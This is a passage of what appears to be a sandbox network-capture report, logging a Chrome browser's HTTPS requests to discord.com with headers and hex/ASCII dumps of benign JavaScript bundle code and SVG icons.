                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1369INData Raw: 6f 29 7b 74 68 69 73 2e 73 61 66 65 53 65 74 53 74 61 74 65 28 7b 73 74 61 74 75 73 3a 70 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 70 72 6f 70 73 2e 6f 6e 45 6e 74 65 72 65 64 28 65 29 7d 29 3b 72 65 74 75 72 6e 7d 74 68 69 73 2e 70 72 6f 70 73 2e 6f 6e 45 6e 74 65 72 28 65 2c 72 29 2c 74 68 69 73 2e 73 61 66 65 53 65 74 53 74 61 74 65 28 7b 73 74 61 74 75 73 3a 63 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 70 72 6f 70 73 2e 6f 6e 45 6e 74 65 72 69 6e 67 28 65 2c 72 29 2c 6e 2e 6f 6e 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 2c 61 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 73 61 66 65 53 65 74 53 74 61 74 65 28 7b 73 74 61 74 75 73 3a 70 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 70 72 6f 70 73 2e 6f 6e 45 6e 74 65 72 65 64 28 65 2c 72 29 7d 29
                                                                                                                                                                                                                                                                                    Data Ascii: o){this.safeSetState({status:p},function(){n.props.onEntered(e)});return}this.props.onEnter(e,r),this.safeSetState({status:c},function(){n.props.onEntering(e,r),n.onTransitionEnd(e,a,function(){n.safeSetState({status:p},function(){n.props.onEntered(e,r)})
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1369INData Raw: 7b 7d 2c 69 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 66 6f 72 28 6f 3d 30 3b 6f 3c 69 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 6e 3d 69 5b 6f 5d 2c 21 28 74 2e 69 6e 64 65 78 4f 66 28 6e 29 3e 3d 30 29 26 26 28 72 5b 6e 5d 3d 65 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 72 7d 28 74 2c 5b 22 63 68 69 6c 64 72 65 6e 22 5d 29 3b 69 66 28 64 65 6c 65 74 65 20 6f 2e 69 6e 2c 64 65 6c 65 74 65 20 6f 2e 6d 6f 75 6e 74 4f 6e 45 6e 74 65 72 2c 64 65 6c 65 74 65 20 6f 2e 75 6e 6d 6f 75 6e 74 4f 6e 45 78 69 74 2c 64 65 6c 65 74 65 20 6f 2e 61 70 70 65 61 72 2c 64 65 6c 65 74 65 20 6f 2e 65 6e 74 65 72 2c 64 65 6c 65 74 65 20 6f 2e 65 78 69 74 2c 64 65 6c 65 74 65 20 6f 2e 74 69 6d 65 6f 75 74 2c 64 65 6c 65 74 65 20 6f 2e 61 64 64 45 6e 64 4c 69 73 74 65 6e 65 72 2c 64
                                                                                                                                                                                                                                                                                    Data Ascii: {},i=Object.keys(e);for(o=0;o<i.length;o++)n=i[o],!(t.indexOf(n)>=0)&&(r[n]=e[n]);return r}(t,["children"]);if(delete o.in,delete o.mountOnEnter,delete o.unmountOnExit,delete o.appear,delete o.enter,delete o.exit,delete o.timeout,delete o.addEndListener,d
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1369INData Raw: 20 63 3d 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 5b 74 5d 7d 29 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 6e 29 7b 76 61 72 20 6f 2c 72 3d 28 6f 3d 65 2e 63 61 6c 6c 28 74 68 69 73 2c 74 2c 6e 29 7c 7c 74 68 69 73 29 2e 68 61 6e 64 6c 65 45 78 69 74 65 64 2e 62 69 6e 64 28 6c 28 6c 28 6f 29 29 29 3b 72 65 74 75 72 6e 20 6f 2e 73 74 61 74 65 3d 7b 68 61 6e 64 6c 65 45 78 69 74 65 64 3a 72 2c 66 69 72 73 74 52 65 6e 64 65 72 3a 21 30 7d 2c 6f 7d 6e 3d 74 2c 6f 3d 65 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61
                                                                                                                                                                                                                                                                                    Data Ascii: c=Object.values||function(e){return Object.keys(e).map(function(t){return e[t]})},p=function(e){function t(t,n){var o,r=(o=e.call(this,t,n)||this).handleExited.bind(l(l(o)));return o.state={handleExited:r,firstRender:!0},o}n=t,o=e,n.prototype=Object.crea
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1369INData Raw: 65 73 3d 7b 74 72 61 6e 73 69 74 69 6f 6e 47 72 6f 75 70 3a 6f 2e 64 65 66 61 75 6c 74 2e 6f 62 6a 65 63 74 2e 69 73 52 65 71 75 69 72 65 64 7d 2c 70 2e 70 72 6f 70 54 79 70 65 73 3d 7b 7d 2c 70 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 3d 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 64 69 76 22 2c 63 68 69 6c 64 46 61 63 74 6f 72 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 7d 3b 76 61 72 20 64 3d 28 30 2c 69 2e 70 6f 6c 79 66 69 6c 6c 29 28 70 29 3b 74 2e 64 65 66 61 75 6c 74 3d 64 2c 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 65 66 61 75 6c 74 7d 2c 31 36 36 38 31 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6f 3d 75 28 6e 28 36 34 34 34 35 29 29 2c 72 3d 75 28 6e 28 31 30 31 36 35 36
                                                                                                                                                                                                                                                                                    Data Ascii: es={transitionGroup:o.default.object.isRequired},p.propTypes={},p.defaultProps={component:"div",childFactory:function(e){return e}};var d=(0,i.polyfill)(p);t.default=d,e.exports=t.default},166810:function(e,t,n){"use strict";var o=u(n(64445)),r=u(n(101656
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1228INData Raw: 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3b 6e 5b 65 2e 6b 65 79 5d 3d 28 72 3d 65 2c 74 26 26 28 30 2c 6f 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 29 28 72 29 3f 74 28 72 29 3a 72 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 20 69 6e 20 74 3f 74 5b 6e 5d 3a 65 5b 6e 5d 7d 65 3d 65 7c 7c 7b 7d 2c 74 3d 74 7c 7c 7b 7d 3b 76 61 72 20 6f 2c 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 69 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 61 20 69 6e 20 65 29 61 20 69 6e 20 74 3f 69 2e 6c 65 6e 67 74 68 26 26 28 72 5b 61 5d 3d 69 2c 69 3d 5b 5d 29 3a 69 2e 70 75 73 68 28 61 29 3b 76 61 72 20 75 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 73 20
                                                                                                                                                                                                                                                                                    Data Ascii: rEach(function(e){var r;n[e.key]=(r=e,t&&(0,o.isValidElement)(r)?t(r):r)}),n}function i(e,t){function n(n){return n in t?t[n]:e[n]}e=e||{},t=t||{};var o,r=Object.create(null),i=[];for(var a in e)a in t?i.length&&(r[a]=i,i=[]):i.push(a);var u={};for(var s


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    145192.168.2.549869162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:54 UTC674OUTGET /assets/5430e9964fe8364e084d.svg HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC954INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:55 GMT
                                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                    Content-Length: 180
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d11c4f3a426d-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "b1d4c5e276e3aaa8ec41e6014dd572b2"
                                                                                                                                                                                                                                                                                    Last-Modified: Sun, 02 Oct 2022 01:17:50 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2B3EZ4Bm3QD22TdM2s6jNSRId1aGgX7hOMQT7T4vOwBUY1ZZYGWqotS88Jka6CrrJFCX0JdFwFOakzTfNiVSaTqTTzxqvnlqrjijpQOfJDaFztVci4PuJIms7sEj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC180INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 39 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 20 39 22 20 77 69 64 74 68 3d 22 36 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 30 20 32 2e 38 33 39 31 32 76 33 2e 33 32 31 37 36 6c 33 20 32 2e 38 33 39 31 32 20 33 2d 32 2e 38 33 39 31 32 76 2d 33 2e 33 32 31 37 36 6c 2d 33 2d 32 2e 38 33 39 31 32 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e
                                                                                                                                                                                                                                                                                    Data Ascii: <svg fill="none" height="9" viewBox="0 0 6 9" width="6" xmlns="http://www.w3.org/2000/svg"><path d="m0 2.83912v3.32176l3 2.83912 3-2.83912v-3.32176l-3-2.83912z" fill="#fff"/></svg>


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    146192.168.2.549873162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:54 UTC674OUTGET /assets/ab03f7053698d417194c.svg HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC956INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:55 GMT
                                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                    Content-Length: 137
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d11dbf021795-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "7d883ba72b5dbc0229f5d1980205ee34"
                                                                                                                                                                                                                                                                                    Last-Modified: Sun, 02 Oct 2022 01:17:54 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HxrAfsQMW3E6VsIAJJvS0d2yVeVuBvMXB99337JG6lmK0KPVhzLqK7eZzGjgMdY34f10y3nWiLflJbikmt4UWIf1%2F%2BkdNgyM4jbxr99mi9kJ9RTvD005RQ4lDcnM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC137INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 20 77 69 64 74 68 3d 22 31 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 35 20 32 68 32 76 38 68 2d 32 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e
                                                                                                                                                                                                                                                                                    Data Ascii: <svg fill="none" height="12" viewBox="0 0 12 12" width="12" xmlns="http://www.w3.org/2000/svg"><path d="m5 2h2v8h-2z" fill="#fff"/></svg>


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    147192.168.2.549874162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:54 UTC674OUTGET /assets/410a2166a48c9e482e2a.svg HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC954INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:55 GMT
                                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                    Content-Length: 395
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d11dbc31430d-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "e843c51c0eec3801b70cae5c45ad343f"
                                                                                                                                                                                                                                                                                    Last-Modified: Sun, 02 Oct 2022 01:17:45 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=76wtwwU8VBIxnayY9GWNPgRyj502PgS0lVZHvQnBvKSO6RgOyNka6x2lrBpBs5QkdTuo7sBElYlkT5JjrxqgCxj76Tg%2BkJHOqXDCylRnfGkOS2mEpEVkBRR32r2y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC395INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 32 2e 39 39 33 32 20 37 2e 34 39 37 32 37 43 35 2e 34 38 30 37 33 20 37 2e 34 39 37 32 37 20 37 2e 34 39 37 32 37 20 35 2e 34 38 30 37 33 20 37 2e 34 39 37 32 37 20 32 2e 39 39 33 32 43 37 2e 34 39 37 32 37 20 31 2e 38 34 34 32 31 20 37 2e 30 36 37 30 34 20 30 2e 37 39 35 37 30 38 20 36 2e 33 35 38 38 39 20 30 43 39 2e 35 30 35 39 35 20 30 2e 31 38 38 33 32 33 20 31 32 20 32 2e 38 30 30 31 38 20 31 32 20 35 2e 39 39 34 35 36 43 31 32 20 39 2e
                                                                                                                                                                                                                                                                                    Data Ascii: <svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M2.9932 7.49727C5.48073 7.49727 7.49727 5.48073 7.49727 2.9932C7.49727 1.84421 7.06704 0.795708 6.35889 0C9.50595 0.188323 12 2.80018 12 5.99456C12 9.


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    148192.168.2.549872162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:54 UTC1398OUTGET /assets/52015caea7357a7a60a9.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    Range: bytes=101503-168251
                                                                                                                                                                                                                                                                                    If-Range: "2088cf886851cb41b694b6059102a249"
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1000INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:55 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 66749
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Content-Range: bytes 101503-168251/168252
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d11e48bf0f85-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "2088cf886851cb41b694b6059102a249"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 13:28:32 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gTJmTBmlykD3%2BAKWO6JpDtvu%2Bptng3mqQk%2FeXrOYwG%2BycgVvmoRm%2Bqcs9FtD0rsrffEvJ9T0dC6XpEaXjSnQXcOid3UcTQVsL0RyIrBIPCnmxJsvOmOddLM9qxoA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC369INData Raw: 2c 5b 52 2c 4c 5d 3d 72 2e 75 73 65 53 74 61 74 65 28 45 3f 30 3a 2d 31 29 2c 50 3d 72 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 2c 4f 3d 72 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 2c 79 3d 72 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 2c 44 3d 72 2e 75 73 65 4d 65 6d 6f 28 5f 2c 5b 5d 29 2c 6b 3d 72 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 2c 6e 2c 69 3b 73 77 69 74 63 68 28 6e 75 6c 6c 3d 3d 3d 28 65 3d 44 5b 52 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 74 79 70 65 29 7b 63 61 73 65 22 64 61 79 22 3a 6e 75 6c 6c 3d 3d 3d 28 74 3d 50 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 66 6f 63 75 73 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 6d 6f 6e 74 68 22 3a 6e 75 6c 6c 3d
                                                                                                                                                                                                                                                                                    Data Ascii: ,[R,L]=r.useState(E?0:-1),P=r.useRef(null),O=r.useRef(null),y=r.useRef(null),D=r.useMemo(_,[]),k=r.useCallback(()=>{var e,t,n,i;switch(null===(e=D[R])||void 0===e?void 0:e.type){case"day":null===(t=P.current)||void 0===t||t.focus();break;case"month":null=
